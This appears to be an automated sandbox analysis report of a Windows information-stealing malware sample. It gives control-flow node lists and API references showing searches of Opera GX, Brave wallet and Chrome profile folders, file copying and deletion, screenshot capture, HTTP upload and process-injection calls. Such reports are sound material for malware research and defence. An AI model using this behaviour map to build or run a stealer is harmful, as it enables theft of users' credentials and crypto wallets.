75114 404c8b 75112->75114 75115 405235 75113->75115 75116 410562 lstrcpyA 75114->75116 75217 413a02 StrCmpCA 75115->75217 75117 404c96 75116->75117 75118 41059c 2 API calls 75117->75118 75119 404cb8 75118->75119 75120 410562 lstrcpyA 75119->75120 75121 404cc3 75120->75121 75122 4105de 3 API calls 75121->75122 75123 404ce4 75122->75123 75124 410562 lstrcpyA 75123->75124 75125 404cef 75124->75125 75126 4105de 3 API calls 75125->75126 75127 404d10 75126->75127 75128 410562 lstrcpyA 75127->75128 75129 404d1b 75128->75129 75130 4105de 3 API calls 75129->75130 75131 404d3d 75130->75131 75132 41059c 2 API calls 75131->75132 75133 404d48 75132->75133 75134 410562 lstrcpyA 75133->75134 75135 404d53 75134->75135 75136 404d69 InternetConnectA 75135->75136 75136->75100 75137 404d97 HttpOpenRequestA 75136->75137 75138 404dd7 75137->75138 75139 405188 InternetCloseHandle 75137->75139 75140 404dfb 75138->75140 75141 404ddf InternetSetOptionA 75138->75141 75139->75100 75142 4105de 3 API calls 75140->75142 75141->75140 75143 404e11 75142->75143 75144 410562 lstrcpyA 75143->75144 75145 404e1c 75144->75145 75146 41059c 2 API calls 75145->75146 75147 404e3e 75146->75147 75148 410562 lstrcpyA 75147->75148 75149 404e49 75148->75149 75150 4105de 3 API calls 75149->75150 75151 404e6a 75150->75151 75152 410562 lstrcpyA 75151->75152 75153 404e75 75152->75153 75154 4105de 3 API calls 75153->75154 75155 404e97 75154->75155 75156 410562 lstrcpyA 75155->75156 75157 404ea2 75156->75157 75158 4105de 3 API calls 75157->75158 75159 404ec3 75158->75159 75160 410562 lstrcpyA 75159->75160 75161 404ece 75160->75161 75162 4105de 3 API calls 75161->75162 75163 404eef 75162->75163 75164 410562 lstrcpyA 75163->75164 75165 404efa 75164->75165 75166 41059c 2 API calls 75165->75166 75167 404f19 75166->75167 75168 410562 lstrcpyA 75167->75168 75169 404f24 75168->75169 75170 4105de 3 API calls 75169->75170 75171 404f45 75170->75171 75172 410562 lstrcpyA 75171->75172 75173 404f50 75172->75173 75174 4105de 3 API 
calls 75173->75174 75175 404f71 75174->75175 75176 410562 lstrcpyA 75175->75176 75177 404f7c 75176->75177 75178 41059c 2 API calls 75177->75178 75179 404f9e 75178->75179 75180 410562 lstrcpyA 75179->75180 75181 404fa9 75180->75181 75182 4105de 3 API calls 75181->75182 75183 404fca 75182->75183 75184 410562 lstrcpyA 75183->75184 75185 404fd5 75184->75185 75186 4105de 3 API calls 75185->75186 75187 404ff7 75186->75187 75188 410562 lstrcpyA 75187->75188 75189 405002 75188->75189 75190 4105de 3 API calls 75189->75190 75191 405023 75190->75191 75192 410562 lstrcpyA 75191->75192 75193 40502e 75192->75193 75194 4105de 3 API calls 75193->75194 75195 40504f 75194->75195 75196 410562 lstrcpyA 75195->75196 75197 40505a 75196->75197 75198 41059c 2 API calls 75197->75198 75199 405079 75198->75199 75200 410562 lstrcpyA 75199->75200 75201 405084 75200->75201 75202 4104bc lstrcpyA 75201->75202 75203 40509f 75202->75203 75204 41059c 2 API calls 75203->75204 75205 4050b6 75204->75205 75206 41059c 2 API calls 75205->75206 75207 4050c7 75206->75207 75208 410562 lstrcpyA 75207->75208 75209 4050d2 75208->75209 75210 4050e8 lstrlenA lstrlenA HttpSendRequestA 75209->75210 75211 40515c InternetReadFile 75210->75211 75212 405176 InternetCloseHandle 75211->75212 75215 40511c 75211->75215 75213 402920 75212->75213 75213->75139 75214 4105de 3 API calls 75214->75215 75215->75211 75215->75212 75215->75214 75216 410562 lstrcpyA 75215->75216 75216->75215 75218 413a21 ExitProcess 75217->75218 75219 413a28 strtok_s 75217->75219 75220 413b88 75219->75220 75233 413a44 75219->75233 75220->74042 75221 413b6a strtok_s 75221->75220 75221->75233 75222 413a61 StrCmpCA 75222->75221 75222->75233 75223 413ab5 StrCmpCA 75223->75221 75223->75233 75224 413af4 StrCmpCA 75224->75221 75224->75233 75225 413b34 StrCmpCA 75225->75221 75226 413b56 StrCmpCA 75226->75221 75227 413a99 StrCmpCA 75227->75221 75227->75233 75228 413b09 StrCmpCA 75228->75221 75228->75233 75229 413a7d StrCmpCA 75229->75221 75229->75233 75230 
413adf StrCmpCA 75230->75221 75230->75233 75231 413b1e StrCmpCA 75231->75221 75232 41051e 2 API calls 75232->75233 75233->75221 75233->75222 75233->75223 75233->75224 75233->75225 75233->75226 75233->75227 75233->75228 75233->75229 75233->75230 75233->75231 75233->75232 75235 4104ee lstrcpyA 75234->75235 75236 405f64 75235->75236 75237 404ab6 5 API calls 75236->75237 75238 405f70 75237->75238 75239 4104bc lstrcpyA 75238->75239 75240 405f8c 75239->75240 75241 4104bc lstrcpyA 75240->75241 75242 405f9c 75241->75242 75243 4104bc lstrcpyA 75242->75243 75244 405fac 75243->75244 75245 4104bc lstrcpyA 75244->75245 75246 405fbc 75245->75246 75247 4104bc lstrcpyA 75246->75247 75248 405fcc InternetOpenA StrCmpCA 75247->75248 75249 406000 75248->75249 75250 4066ff InternetCloseHandle 75249->75250 75251 411c1f 7 API calls 75249->75251 76303 408048 CryptStringToBinaryA 75250->76303 75254 406020 75251->75254 75255 41059c 2 API calls 75254->75255 75257 406033 75255->75257 75256 41051e 2 API calls 75259 406739 75256->75259 75258 410562 lstrcpyA 75257->75258 75263 40603e 75258->75263 75260 4105de 3 API calls 75259->75260 75261 406750 75260->75261 75262 410562 lstrcpyA 75261->75262 75268 40675b 75262->75268 75264 4105de 3 API calls 75263->75264 75265 40606a 75264->75265 75266 410562 lstrcpyA 75265->75266 75267 406075 75266->75267 75270 4105de 3 API calls 75267->75270 75269 41d05a __setlocale_nolock 5 API calls 75268->75269 75271 4067eb 75269->75271 75272 406096 75270->75272 75401 41347f strtok_s 75271->75401 75273 410562 lstrcpyA 75272->75273 75274 4060a1 75273->75274 75275 41059c 2 API calls 75274->75275 75276 4060c3 75275->75276 75277 410562 lstrcpyA 75276->75277 75278 4060ce 75277->75278 75279 4105de 3 API calls 75278->75279 75280 4060ef 75279->75280 75281 410562 lstrcpyA 75280->75281 75282 4060fa 75281->75282 75283 4105de 3 API calls 75282->75283 75284 40611b 75283->75284 75285 410562 lstrcpyA 75284->75285 75286 406126 75285->75286 75287 4105de 3 API calls 75286->75287 75288 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
• Opcode ID: bc716f2625a0e41b2ed4bb766179c27d34b4bc4e0803ef392b74f70fe9059fed
• Instruction ID: 21a79a8d855260e2828667f180bc927f9092200f68422498ddf411ab147124d7
• Opcode Fuzzy Hash: bc716f2625a0e41b2ed4bb766179c27d34b4bc4e0803ef392b74f70fe9059fed
• Instruction Fuzzy Hash: C852F975911312AFDF1ADFA0FD0A8243AABFB08203F11B565E91982274D7774B60EF15

Control-flow Graph

[Control-flow graph for the code starting at 414d08; legend: Executed / Not Executed]
APIs
• wsprintfA.USER32 ref: 00414D5C
• FindFirstFileA.KERNEL32(?,?), ref: 00414D73
• _memset.LIBCMT ref: 00414D8F
• _memset.LIBCMT ref: 00414DA0
• StrCmpCA.SHLWAPI(?,00436A00), ref: 00414DC1
• StrCmpCA.SHLWAPI(?,00436A04), ref: 00414DDB
• wsprintfA.USER32 ref: 00414E02
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414E16
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00414E3F
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00414E56
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00414E68
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00414E7D
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00414ED4
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00414EE9
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00414F02
                                                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414F17
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,00436A30,0043661D), ref: 00414FD0
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FE0
                                                                                                                                                                                                                              • Part of subcall function 0041213B: CreateFileA.KERNEL32(OA,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FEC,?), ref: 00412156
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FF6
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00415001
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00415027
                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00415145
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00415165
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                            • API String ID: 956187361-332874205
                                                                                                                                                                                                                            • Opcode ID: 3e61bb49e99222b85e6a566a6016102fce6695bd526a2befcf9641335af51fec
                                                                                                                                                                                                                            • Instruction ID: ac959522ac8161a8c59de6a03dc3e9916ed04c50c613448a2b432023ce8b070b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e61bb49e99222b85e6a566a6016102fce6695bd526a2befcf9641335af51fec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6C13BB1D0021AABCF22EF60DC45AEE777DAB48304F0140A6FA09B3151DB799B858F59

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,0043731C,004367EE,?,?,?), ref: 00409D9B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437320), ref: 00409DBC
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437324), ref: 00409DD6
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410524
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410556
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX,00437328,?,004367F3), ref: 00409E68
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Brave,00437348,0043734C,00437328,?,004367F3), ref: 00409FEA
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A004
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0C4
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A193
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A1D1
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A23B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0040CCBE), ref: 0040A24E
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A331
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A3F1
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A496
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A4F7
                                                                                                                                                                                                                              • Part of subcall function 00408DAC: lstrlenA.KERNEL32(?), ref: 00408FA5
                                                                                                                                                                                                                              • Part of subcall function 00408DAC: lstrlenA.KERNEL32(?), ref: 00408FC0
                                                                                                                                                                                                                              • Part of subcall function 0040951A: lstrlenA.KERNEL32(?), ref: 00409943
                                                                                                                                                                                                                              • Part of subcall function 0040951A: lstrlenA.KERNEL32(?), ref: 0040995E
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A528
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A5E8
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A67F
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 0040A743
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040A757
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                                                            • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                            • API String ID: 4173076446-1189830961
                                                                                                                                                                                                                            • Opcode ID: 8fc049c6064f073d3ec65615c8ca8381da3a844228e7ecfc0e362c3e7e949e19
                                                                                                                                                                                                                            • Instruction ID: 48880eb817f0d2ddf9522f76590e66a3f39f609c672a9a9f4bfe22da231884da
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fc049c6064f073d3ec65615c8ca8381da3a844228e7ecfc0e362c3e7e949e19
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90421E319002299BCF21FB25DD46BCD7775AF04308F4101AAB948B31A1DBB99ED99F89


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                            • API String ID: 2178766154-445461498
                                                                                                                                                                                                                            • Opcode ID: e612f58ce444cb8feb34317279a8f21faf52f4316bf0fd624547e4b148c88b5c
                                                                                                                                                                                                                            • Instruction ID: 633cccac4349ae0e6520617ab5d327c50858b66953caffa359f965ca5fd0ff30
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e612f58ce444cb8feb34317279a8f21faf52f4316bf0fd624547e4b148c88b5c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6813771D0022DABCF20EB61DC49AC977B9BF08305F0190EAE549A3151DF79ABC98F94
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F6B
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00411F79
                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00411F86
                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00411F8D
                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00411F96
                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FA6
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00411FB3
                                                                                                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FCF
                                                                                                                                                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 0041201E
                                                                                                                                                                                                                            • GlobalLock.KERNEL32(?), ref: 00412027
                                                                                                                                                                                                                            • GlobalSize.KERNEL32(?), ref: 00412033
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                                                                              • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436976,0043695B,00436957,0043694B), ref: 00405588
                                                                                                                                                                                                                              • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00412091
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004120AC
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004120B5
                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004120BD
                                                                                                                                                                                                                            • CloseWindow.USER32(00000000), ref: 004120C4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                                                                            • String ID: {A
                                                                                                                                                                                                                            • API String ID: 2610876673-1031812006
                                                                                                                                                                                                                            • Opcode ID: 7ee3c37e68eeb78f9f832e7fbaf2de79ef316f24f3bf4c5ac8bb4a66aa8c337d
                                                                                                                                                                                                                            • Instruction ID: 1d17374a284164e7c3f8b1b0926b1c833526ee7a057d4b180d112d4aa342f6cd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ee3c37e68eeb78f9f832e7fbaf2de79ef316f24f3bf4c5ac8bb4a66aa8c337d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE51F672800208AFDF15EFA1ED499EEBF7AFF08315F045026FA01E2120D7359A95DB61
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: /$UT
                                                                                                                                                                                                                            • API String ID: 0-1626504983
                                                                                                                                                                                                                            • Opcode ID: 375b76cf62abd5f7dd4df4683fbf8252338f38d1a5fa21a65283e4b32dc89bc6
                                                                                                                                                                                                                            • Instruction ID: 9787a365ec18c0bf1930f8717519833fdc736eeb0207a270142cd3a14faf4db2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 375b76cf62abd5f7dd4df4683fbf8252338f38d1a5fa21a65283e4b32dc89bc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C026DB19442688BDF21DF64CC807EEBBB5AF45304F1440EAD949A7242D7389EC5CF99
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                            • String ID: @iA$ERROR$ERROR$GET
                                                                                                                                                                                                                            • API String ID: 3863758870-3546687611
                                                                                                                                                                                                                            • Opcode ID: 351cdc3c96884ed85ff636cdb7f7cb70b707f938f9ced068266bc9d1f4716f5d
                                                                                                                                                                                                                            • Instruction ID: d8bde7e051fe936688ae94f634ee4e08a5faa0caa340d4fa3fbcfbce63435b0b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 351cdc3c96884ed85ff636cdb7f7cb70b707f938f9ced068266bc9d1f4716f5d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1251A0B1A00229AFDF20AF20DC85AEEB7B9FB04344F0181F6F549B2191CA755EC59F84
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369F3,004369F2,JyA,?,00000000), ref: 00401FA4
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369F6), ref: 004020DD
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
